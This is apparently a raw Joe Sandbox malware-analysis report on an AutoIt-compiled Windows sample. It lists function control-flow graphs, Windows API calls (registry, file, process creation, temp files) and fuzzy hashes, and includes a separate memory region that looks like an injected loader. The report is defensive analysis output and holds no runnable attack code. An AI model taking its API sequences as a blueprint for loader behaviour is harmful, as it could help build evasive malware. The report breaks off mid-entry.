                                        control_flow_graph 302 c3065b-c3068b call c3042f 305 c306a6-c306b2 call c25221 302->305 306 c3068d-c30698 call c1f2c6 302->306 311 c306b4-c306c9 call c1f2c6 call c1f2d9 305->311 312 c306cb-c30714 call c3039a 305->312 313 c3069a-c306a1 call c1f2d9 306->313 311->313 322 c30781-c3078a GetFileType 312->322 323 c30716-c3071f 312->323 320 c3097d-c30983 313->320 324 c307d3-c307d6 322->324 325 c3078c-c307bd GetLastError call c1f2a3 CloseHandle 322->325 327 c30721-c30725 323->327 328 c30756-c3077c GetLastError call c1f2a3 323->328 331 c307d8-c307dd 324->331 332 c307df-c307e5 324->332 325->313 341 c307c3-c307ce call c1f2d9 325->341 327->328 333 c30727-c30754 call c3039a 327->333 328->313 336 c307e9-c30837 call c2516a 331->336 332->336 337 c307e7 332->337 333->322 333->328 344 c30847-c3086b call c3014d 336->344 345 c30839-c30845 call c305ab 336->345 337->336 341->313 352 c3087e-c308c1 344->352 353 c3086d 344->353 345->344 351 c3086f-c30879 call c286ae 345->351 351->320 355 c308c3-c308c7 352->355 356 c308e2-c308f0 352->356 353->351 355->356 360 c308c9-c308dd 355->360 357 c308f6-c308fa 356->357 358 c3097b 356->358 357->358 361 c308fc-c3092f CloseHandle call c3039a 357->361 358->320 360->356 364 c30963-c30977 361->364 365 c30931-c3095d GetLastError call c1f2a3 call c25333 361->365 364->358 365->364
                                        APIs
                                          • Part of subcall function 00C3039A: CreateFileW.KERNELBASE(00000000,00000000,?,00C30704,?,?,00000000,?,00C30704,00000000,0000000C), ref: 00C303B7
                                        • GetLastError.KERNEL32 ref: 00C3076F
                                        • __dosmaperr.LIBCMT ref: 00C30776
                                        • GetFileType.KERNELBASE(00000000), ref: 00C30782
                                        • GetLastError.KERNEL32 ref: 00C3078C
                                        • __dosmaperr.LIBCMT ref: 00C30795
                                        • CloseHandle.KERNEL32(00000000), ref: 00C307B5
                                        • CloseHandle.KERNEL32(?), ref: 00C308FF
                                        • GetLastError.KERNEL32 ref: 00C30931
                                        • __dosmaperr.LIBCMT ref: 00C30938
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: 3f04b126c8ec4ee193204fabe3a15e8ebdf27d09f9277a814eace0272a5c5627
                                        • Instruction ID: 704c86bc0197eca6115dc6e8eb220815539cab08ab122211fe683450d9fda1b4
                                        • Opcode Fuzzy Hash: 3f04b126c8ec4ee193204fabe3a15e8ebdf27d09f9277a814eace0272a5c5627
                                        • Instruction Fuzzy Hash: BBA1F633A141188FDF19AF68D862BAE7BA0AB46320F24015DF8259B2E1D7319D53DB91

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00BF3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CC1418,?,00BF2E7F,?,?,?,00000000), ref: 00BF3A78
                                          • Part of subcall function 00BF3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BF3379
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BF356A
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C3318D
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C331CE
                                        • RegCloseKey.ADVAPI32(?), ref: 00C33210
                                        • _wcslen.LIBCMT ref: 00C33277
                                        • _wcslen.LIBCMT ref: 00C33286
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                        • API String ID: 98802146-2727554177
                                        • Opcode ID: 56d268ca4fcca51eca462132f737ea9197c6e66c649478210400cb389a573f18
                                        • Instruction ID: 37dd1c67f63c81015c21c3c3e6ece37009e18d7eb2e5b845e3dfc04d1e101adb
                                        • Opcode Fuzzy Hash: 56d268ca4fcca51eca462132f737ea9197c6e66c649478210400cb389a573f18
                                        • Instruction Fuzzy Hash: 437167714143449EC314EF65E882EAFBBE8FF89740F44092EF645831B1EB759A48CB62

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00BF2B8E
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00BF2B9D
                                        • LoadIconW.USER32(00000063), ref: 00BF2BB3
                                        • LoadIconW.USER32(000000A4), ref: 00BF2BC5
                                        • LoadIconW.USER32(000000A2), ref: 00BF2BD7
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF2BEF
                                        • RegisterClassExW.USER32(?), ref: 00BF2C40
                                          • Part of subcall function 00BF2CD4: GetSysColorBrush.USER32(0000000F), ref: 00BF2D07
                                          • Part of subcall function 00BF2CD4: RegisterClassExW.USER32(00000030), ref: 00BF2D31
                                          • Part of subcall function 00BF2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF2D42
                                          • Part of subcall function 00BF2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00BF2D5F
                                          • Part of subcall function 00BF2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF2D6F
                                          • Part of subcall function 00BF2CD4: LoadIconW.USER32(000000A9), ref: 00BF2D85
                                          • Part of subcall function 00BF2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF2D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 423443420-4155596026
                                        • Opcode ID: 6f271adb89aa198981dce9d6b5d63cb2c25a2e323e8f9f96f76667ebcbff02b4
                                        • Instruction ID: 4952e6d166f665e3f2c83282812e70d40d079aba2121a8dc35acb49fbb395b0c
                                        • Opcode Fuzzy Hash: 6f271adb89aa198981dce9d6b5d63cb2c25a2e323e8f9f96f76667ebcbff02b4
                                        • Instruction Fuzzy Hash: 98213A70E00358ABDB109FA6EC85FAD7FB4FB49B54F08005AEA00A76B1D3B54550CF94

                                        Control-flow Graph

                                        control_flow_graph 443 bf3170-bf3185 444 bf3187-bf318a 443->444 445 bf31e5-bf31e7 443->445 446 bf318c-bf3193 444->446 447 bf31eb 444->447 445->444 448 bf31e9 445->448 449 bf3199-bf319e 446->449 450 bf3265-bf326d PostQuitMessage 446->450 452 c32dfb-c32e23 call bf18e2 call c0e499 447->452 453 bf31f1-bf31f6 447->453 451 bf31d0-bf31d8 DefWindowProcW 448->451 455 bf31a4-bf31a8 449->455 456 c32e7c-c32e90 call c5bf30 449->456 458 bf3219-bf321b 450->458 457 bf31de-bf31e4 451->457 487 c32e28-c32e2f 452->487 459 bf321d-bf3244 SetTimer RegisterWindowMessageW 453->459 460 bf31f8-bf31fb 453->460 462 bf31ae-bf31b3 455->462 463 c32e68-c32e77 call c5c161 455->463 456->458 480 c32e96 456->480 458->457 459->458 464 bf3246-bf3251 CreatePopupMenu 459->464 466 bf3201-bf3214 KillTimer call bf30f2 call bf3c50 460->466 467 c32d9c-c32d9f 460->467 470 bf31b9-bf31be 462->470 471 c32e4d-c32e54 462->471 463->458 464->458 466->458 473 c32da1-c32da5 467->473 474 c32dd7-c32df6 MoveWindow 467->474 478 bf31c4-bf31ca 470->478 479 bf3253-bf3263 call bf326f 470->479 471->451 483 c32e5a-c32e63 call c50ad7 471->483 481 c32da7-c32daa 473->481 482 c32dc6-c32dd2 SetFocus 473->482 474->458 478->451 478->487 479->458 480->451 481->478 488 c32db0-c32dc1 call bf18e2 481->488 482->458 483->451 487->451 491 c32e35-c32e48 call bf30f2 call bf3837 487->491 488->458 491->451
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BF316A,?,?), ref: 00BF31D8
                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00BF316A,?,?), ref: 00BF3204
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BF3227
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BF316A,?,?), ref: 00BF3232
                                        • CreatePopupMenu.USER32 ref: 00BF3246
                                        • PostQuitMessage.USER32(00000000), ref: 00BF3267
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                        • String ID: TaskbarCreated
                                        • API String ID: 129472671-2362178303
                                        • Opcode ID: 95f1a724247a5f50324ff54d4409b981be80a538ac945f7abc8e14770b202856
                                        • Instruction ID: 9cbb0af2217874c09639502c3dd75df5ac39e26a0f70f381fe2588ccd46193f5
                                        • Opcode Fuzzy Hash: 95f1a724247a5f50324ff54d4409b981be80a538ac945f7abc8e14770b202856
                                        • Instruction Fuzzy Hash: CC41383125020CA7DF146B78DD89F7D3AD9E706B44F0801AAFF16971A2CB71CB489765

                                         Control-flow Graph
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06da4f80cfe73f8800f08c0d81f24fc61ae1630107047897c55257008639fdaa
                                        • Instruction ID: 2733356bb96c4ff547a9fee087565e5d8332d9497d538f08553ffd6526bda3f2
                                        • Opcode Fuzzy Hash: 06da4f80cfe73f8800f08c0d81f24fc61ae1630107047897c55257008639fdaa
                                        • Instruction Fuzzy Hash: 2FC1F375E04269AFDB11DFA8E841BEDBBB0FF0D310F144059E425A7792CB349A42DB61

                                         Control-flow Graph
                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00B60965
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                        • Instruction ID: 72b585a1c89dbc2345f36aa57077cf6bcc5f63417346767eee86068e43ecf7fd
                                        • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                        • Instruction Fuzzy Hash: FC51E775A50208FBEB20DFE5CC89FDF77B8AF48740F108554F64AEA1C0DA789A449B60

                                         Control-flow Graph
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF2C91
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF2CB2
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF1CAD,?), ref: 00BF2CC6
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF1CAD,?), ref: 00BF2CCF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: 155c06cb2817dee4ea48ecb56649213e5ebfbd5ef5b49676fe58124448fddb70
                                        • Instruction ID: d31ee35daaded1327a5c609ab975cfeec6467905c234a4e477caba5c4e1a3a77
                                        • Opcode Fuzzy Hash: 155c06cb2817dee4ea48ecb56649213e5ebfbd5ef5b49676fe58124448fddb70
                                        • Instruction Fuzzy Hash: 38F0D4756402D07AEB311B27AC48F7B2EBDD7CBF68B09006EFD00A25B1C6755850DAB4

                                        Control-flow Graph

                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C62C05
                                        • DeleteFileW.KERNEL32(?), ref: 00C62C87
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C62C9D
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C62CAE
                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C62CC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: File$Delete$Copy
                                        • String ID:
                                        • API String ID: 3226157194-0
                                        • Opcode ID: 580ef9065341c74a8283b63987d59f4f1437e0c6a06cb436adba8de85c19d1d4
                                        • Instruction ID: 013b7a8ea300a83d6aabf2c20e3b0bff7368a5c1756eea6ca6fd7de79cb2909f
                                        • Opcode Fuzzy Hash: 580ef9065341c74a8283b63987d59f4f1437e0c6a06cb436adba8de85c19d1d4
                                        • Instruction Fuzzy Hash: 10B13C72E0051DABDF21DBA4CC85EEEB7BDEF49350F1040A6F609E7151EA309A849F61

                                         Control-flow Graph
                                        APIs
                                          • Part of subcall function 00B622E0: Sleep.KERNELBASE(000001F4), ref: 00B622F1
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B6250B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: GWZNHWCUQT
                                        • API String ID: 2694422964-474333328
                                        • Opcode ID: f736115ccedf803652b755adf4beab10a3a345379c63b3758c6f487b74687f57
                                        • Instruction ID: 4d5ac076a40cac9c6aa1edb328de53ef473d36c0d2ac08afc2d3b3a921df7eb7
                                        • Opcode Fuzzy Hash: f736115ccedf803652b755adf4beab10a3a345379c63b3758c6f487b74687f57
                                        • Instruction Fuzzy Hash: 4F518131D14249EBEF24DBA4C865BEEB7B5EF54300F004598E609BB2C0DB791B45CBA5

                                         Control-flow Graph
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BF3B0F,SwapMouseButtons,00000004,?), ref: 00BF3B40
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BF3B0F,SwapMouseButtons,00000004,?), ref: 00BF3B61
                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BF3B0F,SwapMouseButtons,00000004,?), ref: 00BF3B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: af7722a501f831a38119be4eae44e8d76d99e42a8b4c90607b63a69917cb8fb5
                                        • Instruction ID: 9320895b2379a88bb1f76728ccee472ee4fa0c7dcfd76ada7ec0999eefc9943e
                                        • Opcode Fuzzy Hash: af7722a501f831a38119be4eae44e8d76d99e42a8b4c90607b63a69917cb8fb5
                                        • Instruction Fuzzy Hash: F4112AB5511208FFDB218FA5DC94ABEB7F8EF04B84B10449AA905D7110D3319E449764
                                        Strings
                                        • Variable must be of type 'Object'., xrefs: 00C432B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable must be of type 'Object'.
                                        • API String ID: 0-109567571
                                        • Opcode ID: 9d66d13aa7e2f9c446021f10e5dc0cc6c18595ac72988a9e20d431670db55191
                                        • Instruction ID: f0836118aa69dfcdb5b8b9a0038fd42a5be4ecf837cb949e94ed946fe88f1ee6
                                        • Opcode Fuzzy Hash: 9d66d13aa7e2f9c446021f10e5dc0cc6c18595ac72988a9e20d431670db55191
                                        • Instruction Fuzzy Hash: D8C26C71A00219CFCB24CF58C885ABDB7F1FF48310F2481A9EA65AB2A1D775ED45CB91
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C333A2
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BF3A04
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_wcslen
                                        • String ID: Line:
                                        • API String ID: 2289894680-1585850449
                                        • Opcode ID: 2de98a3531405e49deec157ca6f967766bb046a150743f829fb8da1443c344fb
                                        • Instruction ID: ef633eea71177b7bf4a09630cf73f814a1d92de023717c1762cfbbddf3423a42
                                        • Opcode Fuzzy Hash: 2de98a3531405e49deec157ca6f967766bb046a150743f829fb8da1443c344fb
                                        • Instruction Fuzzy Hash: 9A31C571408348AAC325EB10DC45FFFB7D8AB41754F0845AAFA99930A2DB709B4DC7D6
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00C10668
                                          • Part of subcall function 00C132A4: RaiseException.KERNEL32(?,?,?,00C1068A,?,00CC1444,?,?,?,?,?,?,00C1068A,00BF1129,00CB8738,00BF1129), ref: 00C13304
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00C10685
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: 4412f4f0dab3954c29c9fbe6fbd94e7380c6825f5b1f654141079c3fa00be731
                                        • Instruction ID: 9e3a49975f3a152b97f8b8ea0c85a5a87d18c8c035ceab5e94242db0a8578276
                                        • Opcode Fuzzy Hash: 4412f4f0dab3954c29c9fbe6fbd94e7380c6825f5b1f654141079c3fa00be731
                                        • Instruction Fuzzy Hash: 9CF0C23490030DB7CB14BA64D846CDE7B6D5E02354B704135B924D69D2EFB1DBEAF690
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00B61045
                                        • ExitProcess.KERNEL32(00000000), ref: 00B61064
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$CreateExit
                                        • String ID: D
                                        • API String ID: 126409537-2746444292
                                        • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                        • Instruction ID: 57cf7f381cded42dd39dcd78998d75e68a206fe68b7b4246c664ddefd73ffb7e
                                        • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                        • Instruction Fuzzy Hash: 37F0FF7254024CABDF60DFE4CC49FEE77BCBF04701F148549FB0A9A184DA7896489B61
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C6302F
                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C63044
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: 97b203d8adfca545e68338bf47bb0cdce8fa0b7d071f2e0958a63b7a2ee23977
                                        • Instruction ID: 478f5734f3a369c1c1da1f6e126dae8d3d9a7f4806c7cf35222ba0009336d520
                                        • Opcode Fuzzy Hash: 97b203d8adfca545e68338bf47bb0cdce8fa0b7d071f2e0958a63b7a2ee23977
                                        • Instruction Fuzzy Hash: 76D05EB250032867DA20A7A4AC4EFCB3A6CDB04751F0002A1B655E20D1DAB89984CBE4
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C782F5
                                        • TerminateProcess.KERNEL32(00000000), ref: 00C782FC
                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C784DD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
